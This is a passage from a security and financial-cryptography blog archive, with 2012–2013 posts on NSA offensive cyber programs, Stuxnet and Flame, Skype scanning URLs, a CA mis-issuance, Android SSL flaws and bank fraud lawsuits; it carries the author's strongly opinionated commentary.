    .... Lawmakers who voted to continue the NSA dragnet-surveillance program averaged $41,635 from the pot, whereas House members who voted to repeal authority averaged $18,765.

    So one must revise ones opinion lightly in the face of overwhelming financial evidence: Members of Congress are financially savvy, anything but stupid.

    Which makes the voting public...

    Posted by iang at 10:02 AM | Comments (6) | TrackBack

    July 11, 2013

    The failure of cyber defence - the mindset is against it

    I have sometimes uttered the theory that the NSA is more or less responsible for the failure in defence arts of the net. Here is some circumstantial evidence gleaned from an interview with someone allegedly employed to hack foreigner's computers:

    Grimes: What do you wish we, as in America, could do better hacking-wise?

    Cyber warrior: I wish we spent as much time defensively as we do offensively. We have these thousands and thousands of people in coordinate teams trying to exploit stuff. But we don't have any large teams that I know of for defending ourselves. In the real world, armies spend as much time defending as they do preparing for attacks. We are pretty one-sided in the battle right now.

    My main thesis is that the NSA has erred on the side of destroying the open society's capability of defence (recall interference with PGP, GSM, IETF, cryptography, secure browsing, etc). We are bad at it in the aggregate because our attempts to do better are frustrated in oh so many ways.

    This above claim suggests two things. Firstly, they only know or think to Attack! whatever the problem. Secondly, due to a mindset of offense, the spooks in the aggregate will be unsuited to any mission to assist the defence side. And will be widely perceived to be untrustworthy.

    Hence, any discussions of the dangerous state of civilian defences will only be used as an excuse to boost attack capabilities. Thus making the problem worse.

    For amusement, here are some other snippets:

    Grimes: What happened after you got hired?

    Cyber warrior: I immediately went to work. Basically they sent me a list of software they needed me to hack. I would hack the software and create buffer overflow exploits. I was pretty good at this. There wasn't a piece of software I couldn't break. It's not hard. Most of the software written in the world has a bug every three to five lines of code. It isn't like you have to be a supergenius to find bugs.

    But I quickly went from writing individual buffer overflows to being assigned to make better fuzzers. You and I have talked about this before. The fuzzers were far faster at finding bugs than I was. What they didn't do well is recognize the difference between a bug and an exploitable bug or recognize an exploitable bug from one that could be weaponized or widely used. My first few years all I did was write better fuzzing modules.

    Grimes: How many exploits does your unit have access to?

    Cyber warrior: Literally tens of thousands -- it's more than that. We have tens of thousands of ready-to-use bugs in single applications, single operating systems.

    Grimes: Is most of it zero-days?

    Cyber warrior: It's all zero-days. Literally, if you can name the software or the controller, we have ways to exploit it. There is no software that isn't easily crackable. In the last few years, every publicly known and patched bug makes almost no impact on us. They aren't scratching the surface.

    Posted by iang at 04:32 AM | Comments (4) | TrackBack

    June 19, 2013

    On casting the first cyber-stone, USA declares cyberwar. Everyone loses.

    Following on from revelations of the USA's unilateral act of cyberwar otherwise known as Stuxnet, it is now apparent to all but the most self-serving of Washington lobbyests that Iran has used their defeat to learn and launch the same weapons. VanityFair has the story:

    On the hidden battlefields of history’s first known cyber-war, the casualties are piling up. In the U.S., many banks have been hit, and the telecommunications industry seriously damaged, likely in retaliation for several major attacks on Iran. Washington and Tehran are ramping up their cyber-arsenals, built on a black-market digital arms bazaar, enmeshing such high-tech giants as Microsoft, Google, and Apple.

    The headline victim of the proxy war is the Saudi's state-run oil company bank called Saudi Aramco:

    The data on three-quarters of the machines on the main computer network of Saudi aramco had been destroyed. Hackers who identified themselves as Islamic and called themselves the Cutting Sword of Justice executed a full wipe of the hard drives of 30,000 aramco personal computers. For good measure, as a kind of calling card, the hackers lit up the screen of each machine they wiped with a single image, of an American flag on fire.

    Which makes the American decisions all the more curious.

    For the U.S., Stuxnet was both a victory and a defeat. The operation displayed a chillingly effective capability, but the fact that Stuxnet escaped and became public was a problem.

    How did they think this would not get out? What part of 'virus' and 'anti-virus industry' did they not understand?

    Last June, David E. Sanger confirmed and expanded on the basic elements of the Stuxnet conjecture in a New York Times story, the week before publication of his book Confront and Conceal. The White House refused to confirm or deny Sanger’s account but condemned its disclosure of classified information, and the F.B.I. and Justice Department opened a criminal investigation of the leak, which is still ongoing.

    In Washingtonspeak, that means they did it. Wired and NYT confirm:

    Despite headlines around the globe, officials in Washington have never openly acknowledged that the US was behind the attack. It wasn’t until 2012 that anonymous sources within the Obama administration took credit for it in interviews with The New York Times. [snip...] Citing anonymous Obama administration officials, The New York Times reported that the malware began replicating itself and migrating to computers in other countries. [snip...] In 2006, the Department of Defense gave the go-ahead to the NSA to begin work on targeting these centrifuges, according to The New York Times.

    We now have enough evidence to decide, beyond reasonable doubt, that the USA and Israel launched a first-strike cyber attack against an enemy it was not at war with. Which succeeded, damages are credibly listed.

    Back to the VanityFair article: What made the Whitehouse think they wouldn't then unleash a tiger they tweaked by the tail?

    Sanger, for his part, said that when he reviewed his story with Obama-administration officials, they did not ask him to keep silent. According to a former White House official, in the aftermath of the Stuxnet revelations “there must have been a U.S.-government review process that said, This wasn’t supposed to happen. Why did this happen? What mistakes were made, and should we really be doing this cyber-warfare stuff? And if we’re going to do the cyber-warfare stuff again, how do we make sure (a) that the entire world doesn’t find out about it, and (b) that the whole world does not fucking collect our source code?”

    None of it makes sense unless we assume that Washington DC is so disconnected from the reality of the art of cyber-security. It gets worse:

    One of the most innovative features of all this malware—and, to many, the most disturbing—was found in Flame, the Stuxnet precursor. Flame spread, among other ways, and in some computer networks, by disguising itself as Windows Update. Flame tricked its victim computers into accepting software that appeared to come from Microsoft but actually did not. Windows Update had never previously been used as camouflage in this malicious way. By using Windows Update as cover for malware infection, Flame’s creators set an insidious precedent. If speculation that the U.S. government did deploy Flame is accurate, then the U.S. also damaged the reliability and integrity of a system that lies at the core of the Internet and therefore of the global economy.

    Which Microsoft is now conspiratorial in:

    Microsoft Corp. (MSFT), the world’s largest software company, provides intelligence agencies with information about bugs in its popular software before it publicly releases a fix, according to two people familiar with the process. That information can be used to protect government computers and to access the computers of terrorists or military foes.

    Redmond, Washington-based Microsoft (MSFT) and other software or Internet security companies have been aware that this type of early alert allowed the U.S. to exploit vulnerabilities in software sold to foreign governments, according to two U.S. officials. Microsoft doesn’t ask and can’t be told how the government uses such tip-offs, said the officials, who asked not to be identified because the matter is confidential.

    Frank Shaw, a spokesman for Microsoft, said those releases occur in cooperation with multiple agencies and are designed to give government “an early start” on risk assessment and mitigation.

    In an e-mailed statement, Shaw said there are “several programs” through which such information is passed to the government, and named two which are public, run by Microsoft and for defensive purposes.

    Notice the discord between those positions. Microsoft will now be vulnerable to civil suits around the world for instances where bugs were disclosed and then used against victims. Why is this? Why is the cozy cognitive dissonance of the Americans worthless elsewhere? Simple: immunity by the US Government only works in the USA. Spying, cyber attacks, and conspiracy to destroy state equipment are illegal elsewhere.

    And:

    For at least a decade, Western governments—among them the U.S., France, and Israel—have been buying “bugs” (flaws in computer programs that make breaches possible) as well as exploits (programs that perform jobs such as espionage or theft) not only from defense contractors but also from individual hackers. The sellers in this market tell stories that suggest scenes from spy novels. One country’s intelligence service creates cyber-security front companies, flies hackers in for fake job interviews, and buys their bugs and exploits to add to its stockpile. Software flaws now form the foundation of almost every government’s cyber-operations, thanks in large part to the same black market—the cyber-arms bazaar—where hacktivists and criminals buy and sell them. ...

    In the U.S., the escalating bug-and-exploit trade has created a strange relationship between government and industry. The U.S. government now spends significant amounts of time and money developing or acquiring the ability to exploit weaknesses in the products of some of America’s own leading technology companies, such as Apple, Google, and Microsoft. In other words: to sabotage American enemies, the U.S. is, in a sense, sabotaging its own companies.

    It's another variant on the old biblical 30 pieces of silver story. The US government is by practice and policy undermining the trust in its own industry.

    So where does this go? As I have oft mentioned, as long as the intelligence information collected stayed in the community, the act of spying represented not much of a threat to the people. But that is far different to aggressive first-strike attacks, and it is far different to industrial espionage run by the state:

    Thousands of technology, finance and manufacturing companies are working closely with U.S. national security agencies, providing sensitive information and in return receiving benefits that include access to classified intelligence, four people familiar with the process said.

    These programs, whose participants are known as trusted partners, extend far beyond what was revealed by Edward Snowden, a computer technician who did work for the National Security Agency. The role of private companies has come under intense scrutiny since his disclosure this month that the NSA is collecting millions of U.S. residents’ telephone records and the computer communications of foreigners from Google Inc (GOOG). and other Internet companies under court order.

    ...

    Along with the NSA, the Central Intelligence Agency (0112917D), the Federal Bureau of Investigation and branches of the U.S. military have agreements with such companies to gather data that might seem innocuous but could be highly useful in the hands of U.S. intelligence or cyber warfare units, according to the people, who have either worked for the government or are in companies that have these accords.

    Pure intelligence for state purposes is no longer a plausible claim. Cyberwar is unleashed, pandorra's box is opened. The agency has crossed the commercial barriers, swapping product for information. With thousands of companies.

    Back to the attack on Iran. Last week I was reading _The Rommel Papers_, the post-humous memoirs of the late great WWII general Erwin Rommel. In passing, he opined that when the 'terrorists' struck at his military operations in North Africa, the best strategy was to ignore it. He did, and nothing much happened. Specifically, he eschewed the civilian reprisals so popular in films and novels, and he did not do much or anything to chase up who might be responsible. Beyond normal police operations, presumably.

    The USA's strategy for pinprick is the reverse of Rommel's. Attacks on the Iranians seem to elicit a response.

    Sure enough, in August 2012 a devastating virus was unleashed on Saudi Aramco, the giant Saudi state-owned energy company. The malware infected 30,000 computers, erasing three-quarters of the company’s stored data, destroying everything from documents to email to spreadsheets and leaving in their place an image of a burning American flag, according to The New York Times. Just days later, another large cyberattack hit RasGas, the giant Qatari natural gas company. Then a series of denial-of-service attacks took America’s largest financial institutions offline. Experts blamed all of this activity on Iran, which had created its own cyber command in the wake of the US-led attacks.

    So, let's inventory the interests here.

    For uninvolved government agencies, mainstreet USA, banks, and commercial industry there and in allied countries, this is total negative: They will bear the cost.

    For the NSA (and here I mean the NSA/CIA/DoD/Mossad group), there is no plausible harm. The NSA carries no cost. Meanwhile the NSA maintains and grows its already huge capability to collect huge amounts of boring data. And, launch pre-emptive strikes against Iran's centrifuges. And the program to sign up most of the USA's security industry in the war against everyone has yielded thousands of sign-ups, thus tarring the entirety of the USA with the same brush.

    And indeed, for the NSA, the responses by Iran -- probably or arguably justifiable and "legal" under the international laws of war -- represent an opportunity to further stress their own growth. It's all upside for the them:

    Inside the government, [General Alexander] is regarded with a mixture of respect and fear, not unlike J. Edgar Hoover, another security figure whose tenure spanned multiple presidencies. “We jokingly referred to him as Emperor Alexander—with good cause, because whatever Keith wants, Keith gets,” says one former senior CIA official who agreed to speak on condition of anonymity. “We would sit back literally in awe of what he was able to get from Congress, from the White House, and at the expense of everybody else.”

    What about Iran? Well, it has made it clear that regime change is not on the agenda which is what the USA really wants. As it will perceive that the USA won't stop, it has few options but to defend. Which regime would be likely to back down when it knows there is no accomodation on the other side?

    Iran is a specialist in asymmetric attacks (as it has to be) so we can predict that their Stuxnet inspiration will result in many responses in the past and the future. Meanwhile, the USA postures that a cyber attack is cause for going physical, and the USA has never been known to back down in face of a public lashing.

    All signs point to escalation. Which plays into the NSA's hands:

    The cat-and-mouse game could escalate. “It’s a trajectory,” says James Lewis, a cyber­security expert at the Center for Strategic and International Studies. “The general consensus is that a cyber response alone is pretty worthless. And nobody wants a real war.” Under international law, Iran may have the right to self-defense when hit with destructive cyberattacks. William Lynn, deputy secretary of defense, laid claim to the prerogative of self-defense when he outlined the Pentagon’s cyber operations strategy. “The United States reserves the right,” he said, “under the laws of armed conflict, to respond to serious cyberattacks with a proportional and justified military response at the time and place of our choosing.” Leon Panetta, the former CIA chief who had helped launch the Stuxnet offensive, would later point to Iran’s retaliation as a troubling harbinger. “The collective result of these kinds of attacks could be a cyber Pearl Harbor,” he warned in October 2012, toward the end of his tenure as defense secretary, “an attack that would cause physical destruction and the loss of life.” If Stuxnet was the proof of concept, it also proved that one successful cyberattack begets another. For Alexander, this offered the perfect justification for expanding his empire.

    Conclusion? The NSA are not going to be brought to heel. Congress will remain ineffective, shy of governance and innocent of the war it has signed-off on.

    The cyber divisions are going to have their day in the field. And the businesses of the USA and its public allies are going to carry the cost of a hot cyberwar.

    The U.S. banking leadership is said to be extremely unhappy at being stuck with the cost of remediation—which in the case of one specific bank amounts to well over $10 million. The banks view such costs as, effectively, an unlegislated tax in support of U.S. covert activities against Iran. The banks “want help turning [the DDoS] off, and the U.S. government is really struggling with how to do that. It’s all brand-new ground,” says a former national-security official. And banks are not the only organizations that are paying the price. As its waves of attacks continue, Qassam has targeted more banks (not only in the U.S., but also in Europe and Asia) as well as brokerages, credit-card companies, and D.N.S. servers that are part of the Internet’s physical backbone.

    And, it's going to go kinetic.

    ...at a time when the distinction between cyberwarfare and conventional warfare is beginning to blur. A recent Pentagon report made that point in dramatic terms. It recommended possible deterrents to a cyberattack on the US. Among the options: launching nuclear weapons.

    Not a smart situation. When you look at the causes of this, there isn't even a plausible cassus belli here. It's more like boys with too-big toys playing a first-person shoot-em-up video game, where they carry none of the costs of the shots.

    But it gets worse. Having caused this entire war to come, the biggest boy with the biggest toy says:

    Alexander runs the nation’s cyberwar efforts, an empire he has built over the past eight years by insisting that the US’s inherent vulnerability to digital attacks requires him to amass more and more authority over the data zipping around the globe. In his telling, the threat is so mind-bogglingly huge that the nation has little option but to eventually put the entire civilian Internet under his protection, requiring tweets and emails to pass through his filters, and putting the kill switch under the government’s forefinger. “What we see is an increasing level of activity on the networks,” he said at a recent security conference in Canada. “I am concerned that this is going to break a threshold where the private sector can no longer handle it and the government is going to have to step in.”

    !

    Posted by iang at 09:30 AM | Comments (1) | TrackBack

    May 16, 2013

    All Your Skype Are Belong To Us

    It's confirmed -- Skype is revealing traffic to Microsoft.

    A reader informed heise Security that he had observed some unusual network traffic following a Skype instant messaging conversation. The server indicated a potential replay attack. It turned out that an IP address which traced back to Microsoft had accessed the HTTPS URLs previously transmitted over Skype. Heise Security then reproduced the events by sending two test HTTPS URLs, one containing login information and one pointing to a private cloud-based file-sharing service. A few hours after their Skype messages, they observed the following in the server log:

    65.52.100.214 - - [30/Apr/2013:19:28:32 +0200]
    "HEAD /.../login.html?user=tbtest&password=geheim HTTP/1.1"

    Utrace map
    Zoom The access is coming from systems which clearly belong to Microsoft.
    Source: Utrace They too had received visits to each of the HTTPS URLs transmitted over Skype from an IP address registered to Microsoft in Redmond. URLs pointing to encrypted web pages frequently contain unique session data or other confidential information. HTTP URLs, by contrast, were not accessed. In visiting these pages, Microsoft made use of both the login information and the specially created URL for a private cloud-based file-sharing service.

    Now, the boys & girls at Heise are switched-on, unlike their counterparts on the eastern side of the pond. Notwithstanding, Adam Back of hashcash fame has confirmed the basics: URLs he sent to me over skype were picked up and probed by Microsoft.

    What's going on? Microsoft commented:

    In response to an enquiry from heise Security, Skype referred them to a passage from its data protection policy:

    "Skype may use automated scanning within Instant Messages and SMS to (a) identify suspected spam and/or (b) identify URLs that have been previously flagged as spam, fraud, or phishing links."

    A spokesman for the company confirmed that it scans messages to filter out spam and phishing websites.

    Which means Microsoft can scan ALL messages to ANYONE. Which means they are likely fed into Echelon, either already, or just as soon as someone in the NSA calls in some favours. 10 minutes later they'll be realtimed to support, and from thence to datamining because they're pissed that google's beating the hell out of Microsoft on the Nasdaq.

    Game over?

    Or exaggeration? It's just fine and dandy as all the NSA are interested in is matching the URLs to jihadist websites. I don't care so much for the towelheads. But, from the manual of citizen control comes this warning:

    First they came for the jihadists,
    and I didn't speak out because I wasn't a jihadist.

    Then they came for the cypherpunks,
    and I didn't speak out because I wasn't a cypherpunk.

    Then they came for the bloggers,
    and I didn't speak out because I wasn't a blogger.

    Then they came for me,
    and there was no one left to speak for me.


    Skype, game over.

    Posted by iang at 02:25 PM | Comments (5) | TrackBack

    May 06, 2013

    What makes financial cryptography the absolutely most fun field to be in?

    Quotes that struck me as on-point: Chris Skinner says of SEPA or the Single-European-Payment-Area:

    One of the key issues is that when SEPA was envisaged and designed, counterparty credit risk was not top of the agenda; post-Lehman Brothers crash and it is.

    What a delight! Oh, to design a payment system without counterparty risk ... Next thing they'll be suggesting payments without theft!

    Meanwhile Dan Kaminsky says in delicious counterpoint, commenting on Bitcoin:

    But the core technology actually works, and has continued to work, to a degree not everyone predicted. Time to enjoy being wrong. What the heck is going on here?

    First of all, yes. Money changes things.

    A lot of the slop that permeates most software is much less likely to be present when the developer is aware that, yes, a single misplaced character really could End The World. The reality of most software development is that the consequences of failure are simply nonexistent. Software tends not to kill people and so we accept incredibly fast innovation loops because the consequences are tolerable and the results are astonishing.

    BitCoin was simply developed under a different reality.

    The stakes weren’t obscured, and the problem wasn’t someone else’s.

    They didn’t ignore the engineering reality, they absorbed it and innovated ridiculously

    Welcome to financial cryptography -- that domain where things matter. It is this specialness, that ones code actually matters, that makes it worth while.

    Meanwhile, from the department of lolz, comes Apple with a new patent -- filed at least.

    The basic idea, described in a patent application “Ad-hoc cash dispensing network” is pretty simple. Create a cash dispensing server at Apple’s datacenter, to which iPhones, iPads and Macs can connect via a specialized app. Need some quick cash right now and there’s no ATM around? Launch the Cash app, and tell it how much do you need. The app picks up your location, and sends the request for cash to nearby iPhone users. When someone agrees to front you $20, his location is shown to you on the map. You go to that person, pick up the bill and confirm the transaction on your iPhone. $20 plus a small service fee is deducted from your iTunes account and deposited to the guy who gave you the cash.

    The good thing about being an FCer is that you can design that one over beers, and have a good belly laugh for the same price. I don't know how to put it gently, but hey guys, don't do that for real, ok?!

    All by way of saying, financial cryptography is where it's at!

    Posted by iang at 03:20 PM | Comments (1) | TrackBack

    March 05, 2013

    How to use PGP to verify that an email is authentic

    Ironic as xkcd nails it, at least one can draw the picture. What instruction would one draw for secure browsing these days?

    Posted by iang at 06:26 PM | Comments (1) | TrackBack

    January 05, 2013

    Yet another CA snafu

    In the closing days of 2012, another CA was caught out making mistakes:

    2012.5 -- A CA here issued 2 intermediate roots to two separate customers 8th August 2011 Mozilla mail/Mert Özarar. The process that allowed this to happen was discovered later on, fixed, and one of the intermediates was revoked. On 6th December 2012, the remaining intermediate was placed into an MITM context and used to issue an unauthorised certificate for *.google.com DarkReading. These certificates were detected by Google Chrome's pinning feature, a recent addition. "The unauthorized Google.com certificate was generated under the *.EGO.GOV.TR certificate authority and was being used to man-in-the-middle traffic on the *.EGO.GOV.TR network" wired. Actions. Vendors revoked the intermediates microsoft, google, Mozilla. Damages. Google will revoke Extended Validation status on the CA in January's distro, and Mozilla froze a new root of the CA that was pending inclusion.

    I collect these stories for a CA risk history, which can be useful in risk analysis.

    Beyond that, what is there to say? It looks like this CA made a mistake that let some certs slip out. It caught one of them later, not the other. The owner/holder of the cert at some point tried something different, including an MITM. One can see the coverup proceeding from there...

    Mistakes happen. This so far is somewhat distinct from issuing root certs for the deliberate practice of MITMing. It is also distinct from the overall risk equation that says that because all CAs can issue certs for your browser, only one compromise is needed, and all CAs are compromised. That is, brittle.

    But what is now clear is that the trend started in 2011 is confirmed in 2012 - we have 5+ incidents in each year. For many reasons, the CA business has reached a plateau of aggressive attention. It can now consider itself under attack, after 15 or so years of peace.

    Posted by iang at 04:14 PM | Comments (3) | TrackBack

    November 22, 2012

    Facebook goes HTTPS-always - victory after a long hard decade

    In news that might bemuse, Facebook is in the process of turning on SSL for all time. In this it is following google and others. In that, they, meaning google and Co., are following yet others including EFF, Mozilla and a bunch of others.

    Those, they are following Tyler, Amir, Ahmad and yours truly.

    We have been pushing for the use of all-authenticated web pages for around 8 years now. The reason is complicated and it is *nothing to do with wifi* but it's ok to use that excuse if that is easier to explain. It is really all about phishing which causes an MITM against a web-user (SSL or not). The reason is this: if we have SSL always on then we can rely on a whole bunch of other protections to lock in the user: pinning and client certificates spring to mind, but also never forget that the CA was supposed to show the user she was on their own bank, not somewhere else.

    But, without SSL always on, solutions were complicated, impossible, or easily tricked. So a deep analysis concluded, back in the mid 2000s that we had to move the net across to all-SSL, only SSL for any user-interactions sites. (Which since then has become all of them -- remember that surfing in a basic read-only mode was possible in those days...)

    A project was born. Slowly, TLS/SNI was advanced. Browsers experimented with new/old SSL display ideas. All browsers upgraded to SSL v3 then to TLS. Servers followed suite, s.l.o.w.l.y.... SSL v2 got turned off, painfully. Various projects sprung up to report on SSL weaknesses, although they don't report on the absence of SSL, the greatest weakness of them all... OK, small baby steps, let's not rush it. Indeed - the reason my long-suffering readers have to deal with this site in SSL is because of that project. We eat my dogfood.

    And, finally, some leaders started doing more widespread SSL.

    ( For those old timers who remember - this is how it was supposed to be. SSL was supposed to be always on. But back in 1995, it was discovered to be too expensive, so the business folks split the website and broke the security model (again!). Now, there is no such excuse, and google reports somewhere that there was no hit to its performance. 15 years later :) )

    This is good news - we have reached a major milestone. I'll leave you with this one thought.

    This response all started with phishing. Which started in 2001, and got really going by 2003. Now, if we call Facebook the midpoint of the response ("before FB, you were early, after, you're a laggard!"), we can conclude that the Internet's security lifecycle, or the OODA loop, is a decade long.

    This observation I especially leave there for those thinking about starting a little cyber war.

    Posted by iang at 10:29 AM | Comments (0) | TrackBack

    November 21, 2012

    Some One Thing you know, you have, you are

    Reading the FinServices' toungue-in-cheek prediction that "we should all be using Biometrics," I was struck by an old security aphorism was:

    Something you know, something you have, something you are.

    The idea being that each of these was an independent system, so if we had a weak system in each domain, we could construct a strong system by redundantly combining all three. It wasn't perfect, it was a classical strength-through-redundancy design, but you could be forgiven for thinking it was the holy grail because it was repeated so often by security people.

    Meanwhile, life has moved on. And it has moved on to the point where we now have a convergence of these things into one:

    the mobile phone

    The mobile (or cell or handy as it is known) is decidedly something you have - and we can imagine bluetooth protocols to authenticate in a wireless context. We have SMS, RFIC and NFC for those who like acronyms.

    It is also something you know. The individual knows how to fire up and run the apps on her phone. More so than anyone else - smartphones these days have lots of personality for our users to relish in. It is just an application design question to best show that this woman knows her own phone and others do not. Trivial solutions left to reader.

    Finally -- the phone is something you are. If you don't follow that, you've been in a cave for the last decade. Start your catchup by buying an iPhone and asking your 13 year old to install some apps. Watch that movie _The Social Network_. Install the facebook app, perhaps related to that movie.

    The mobile phone is something you know, have and are. It will become the one security Thing of the future. This one Thing has some good aspects, and some bad aspects too. For one, if you lose the One, you're screwed. Even with obvious downsides, users will choose this one option, and as systems providers, we might as bind with them over it.

    With further apologies to J.R.R. Tolkein,

    One Thing to rule them all,
    One Thing to find them,
    One Thing to bring them all
    and in the darkness bind them.
    Posted by iang at 11:29 AM | Comments (1) | TrackBack

    October 21, 2012

    Planet SSL: mostly harmless

    One of the essential requirements of any system is that it actually has to work for people, and work enough of the time to make a positive difference. Unfortunately, this effect can be confused with security systems because attacks can either be rare or hidden. In such an environment, we find persistent emphasis on strong branding more than proven security out in the field.

    SSL has frequently been claimed to be the worlds' most successful most complicated security system -mostly because mostly everything in SSL is oriented to relying on certificates, which are their own market-leading complication. It has therefore been suggested (here and in many other places) that SSL's protection is somewhere between mostly harmless, and mildly annoying but useful. Here's more evidence along those lines:

    "Why Eve and Mallory Love Android: An Analysis of Android SSL (In)Security"

    ...The most common approach to protect data during communication on the Android platform is to use the Secure Sockets Layer (SSL) or Transport Layer Security (TLS) protocols. To evaluate the state of SSL use in Android apps, we downloaded 13,500 popular free apps from Google’s Play Market and studied their properties with respect to the usage of SSL. In particular, we analyzed the apps’ vulnerabilities against Man-in-the-Middle (MITM) attacks due to the inadequate or incorrect use of SSL.

    Some headlines, paraphrased:

    • 8.0% of the apps examined automatically contain SSL/TLS code that is potentially vulnerable to MITM attacks.
    • 41% of apps selected for manual audit exhibited various forms of SSL/TLS misuse that allowed us to successfully launch MITM attacks...
    • Half of users questioned were not able to correctly judge whether their browser session was protected by SSL/TLS or not.
    • 73.6% of apps could have used HTTPS instead of HTTP with minimal effort by adding a single character to the target URLs.
    • 17.28% accepted any hostname or any certificate!
    • 56% of banks "protected" by one generic banking app were breached by MITM attack.
    • One browser accepts any certificates...
    • One anti-virus product relied on SSL and not its own signature system, and was therefore vulnerable to being tricked into deleting itself :P

    With numbers like these, we can pretty much conclude that SSL is unreliable in that domain - no real user can even come close to relying on its presence.

    The essential cause of this is that the secure browsing architecture is too complicated to work. It relies on too many "and that guy has to do all this" exceptions. Worse, the Internet browsing paradigm requires that the system work flawlessly or not at all, which conundrum this paper perhaps reveals as: flawlessly hidden and probably not working either.

    This is especially the case in mobile work, where fast time cycles and compact development contexts conspire to make security less of a leading requirement; Critics will complain that the app developers should fix their code, and SSL works fine when it is properly deployed. Sure, that's true but it consistently doesn't happen, the SSL architecture is at fault for its low rates of reliable deployment. If a security architecture cannot be reliably deployed in adverse circumstances such as mobile, why would you bother?

    So where do we rate SSL? Mostly harmless, a tax on the Internet world, or a barrier to a better system?

    Posted by iang at 04:18 AM | Comments (2) | TrackBack

    August 26, 2012

    Use another browser - Kaspersky follows suit

    You saw it here first :) Kaspersky has dipped into the payments market with a thing called Safe Money:

    A new offering found in Kaspersky Internet Security is Safe Money, Kaspersky Lab's unique technology designed to protect the user's money when shopping and banking online. To keep your cash safe, Kaspersky Internet Security's Safe Money will:
      1. Automatically activate when visiting most common payment services (PayPal, etc.), banking websites, and you can easily add your own bank or shopping websites to the list.
      2. *Isolate your payment operations in a special web browser to ensure your transactions aren't monitored*.
      3. Verify the authenticity of the banking or payment website itself, to ensure the site isn't compromised by malware, or a fake website designed to look authentic.
      4. Evaluate the security status of your computer, and warn about any existing threats that should be addressed prior to making payments.
      5. Provide an onscreen Virtual Keyboard when entering your credit card or payment information so you can enter your information with mouse-clicks. This will activate a special program to prevent malware from logging any keystrokes on your physical keyboard.
      ...

    The #2 tip is the same as the #2 one that's been on this website for years - use one browser for common stuff and another for your online payments. This simple trick builds a good solid firewall between your money and the crooks' hands. What's more, it's easy enough to teach grandma and grandson.

    (For those lost for clue, download Chrome and Firefox. I advise using Safari for banking, Firefox for routine stuff and Chrome for google stuff. Whatever you do, keep that banking browser closed and locked down, until it is time to bring it up, switch to privacy mode, and type in the URL by hand.)

    Aside from Kaspersky's thumbs-up for the #2, what else can we divine? If Kaspersky, one of the more respected anti-virus providers, has decided to dip its toe into payments protection, this might be a signal that phishing and malware is not reducing. Or, at least, the perception has not diminished.

    Out there in user-land, people don't really trust browsers to do their security, and since GFC-1 they don't really trust banks either. (They've never ever trusted CAs.) This doesn't mean they can voice, explain or argue their mistrust, but it does mean that they feel the need - it is this perception that Kapersky hopes to sell into.

    Chances are, it's a good pick, if only because we're all going to die before any of these providers deals with their cognitive dissonance on trust. Good luck Kaspersky, and hopefully you won't succumb to it either.

    Posted by iang at 07:34 AM | Comments (7) | TrackBack

    June 20, 2012

    Banks will take responsibility for online fraud

    Several cases in USA are resolving in online theft via bank account hackery. Here's one:

    Village View Escrow Inc., which in March 2010 lost nearly $400,000 after its online bank account with Professional Business Bank was taken over by hackers, has reached a settlement with the bank for an undisclosed amount, says Michelle Marsico, Village View's owner and president.

    As a result of the settlement, Village View recovered more than the full amount of the funds that had been fraudulently taken from the account, plus interest, the company says in a statement.

    And two more:

    Two similar cases, PATCO Construction Inc. vs. Ocean Bank and Experi-Metal Inc. vs. Comerica Bank, raised questions about liability and reasonable security, yet each resulted in a different verdict.

    In 2010, PATCO sued Ocean Bank for the more than $500,000 it lost in May 2009, after its commercial bank account with Ocean Bank was taken over. PATCO argued that Ocean Bank was not complying with existing FFIEC requirements for multifactor authentication when it relied solely on log-in and password credentials to verify transactions.

    Last year, a District Court magistrate found the bank met legal requirements for multifactor authentication and dismissed the suit.

    In December 2009, EMI sued Comerica after more than $550,000 in fraudulent wire transfers left EMI's account.

    In the EMI ruling, the court found that Comerica should have identified and disallowed the fraudulent transactions, based on EMI's history, which had been limited to transactions with a select group of domestic entities. The court also noted that Comerica's knowledge of phishing attempts aimed at its clients should have caused the bank to be more cautious.

    In the ruling, the court required Comerica to reimburse EMI for the more than $560,000 it lost after the bank approved the fraudulent wire transfers.

    Here's how it happens. There will be many of these. Many of the victims will sue. Many if the cases will lose.

    Those that lose are irrelevant. Those that win will set the scene. Eventually some precedent will be found, either at law or at reputation, that will allow people to trust banks again. Some more commentary.

    The reason for the inevitability of this result is simple: society and banks both agree that we don't need banks unless the money is safe.

    Online banking isn't safe. It behoves to the banks to make it safe. We're in the phase where the court of law and public opinion are working to get that result.

    Posted by iang at 04:42 PM | Comments (2) | TrackBack

    June 16, 2012

    The Equity Debate

    I don't normally copy directly from others, but the following post by Bruce Schneier provides an introduction to one of the most important topics in Information Security. I have tried long and hard to write about it, but the topic is messy, controversial and hard evidence is thin. Here goes...

    Bruce Schneier writes in Forbes about the booming vulnerabilities market:

    All of these agencies have long had to wrestle with the choice of whether to use newly discovered vulnerabilities to protect or to attack. Inside the NSA, this was traditionally known as the "equities issue," and the debate was between the COMSEC (communications security) side of the NSA and the SIGINT (signals intelligence) side. If they found a flaw in a popular cryptographic algorithm, they could either use that knowledge to fix the algorithm and make everyone's communications more secure, or they could exploit the flaw to eavesdrop on others -- while at the same time allowing even the people they wanted to protect to remain vulnerable. This debate raged through the decades inside the NSA. From what I've heard, by 2000, the COMSEC side had largely won, but things flipped completely around after 9/11.

    It's probably worth reading the rest of the article too - I only took the one para talking about the Equities Debate.

    What's it about? Well, in a nutshell, the intelligence community debated long and hard about whether to allow the world's infosec infrastructure to be vulnerable, so as to assist spying. Or not.... Is there such a stark choice? The answer to this is a bit difficult to prove, but I'm going to put my money on YES: for the NSA it is either/or. The reason for this is that when the NSA goes for vulnerabilities, there are all sorts of flow-on effects:

    Limiting research, either through government classification or legal threats from venders, has a chilling effect. Why would professors or graduate students choose cryptography or computer security if they were going to be prevented from publishing their results? Once these sorts of research slow down, the increasing ignorance hurts us all.

    I remember this from my early formative years in University - security work was considered a bad direction to head. As you got into it you found all of these restrictions and regulations. It just had a bad taste, the brighter people were bright enough to go elsewhere.

    In general, it seems that the times the NSA has erred on the side of "YES! let them be weak," that we are now counting the cost. If you look back through the last couple of decades, the mantra is very clear: security is an afterthought. That's in large part because almost nobody coming out of the training camps is steeped in it. We got away with this for a decade or two when the Internet was in its benign phase - 1990s, spam, etc.

    But that's all changed now. Chickens now come home to roost. For one example, if you look at the timeline of CA attacks over the last decade, there is a noticeable spike in 2011. For another, look at Stuxnet and Flame as a cyberweapons of inspiration.

    Which brings costs to everyone.

    I personally think the Equity Issue within the NSA is perhaps the single most important information security influence, ever. Their mission is dual-fold, to protect and the listen. By choosing vulnerability over protection, we have all suffered. We are now in the cost-amortisation phase; for the next decade we will suffer a non-benign Internet risks environment.

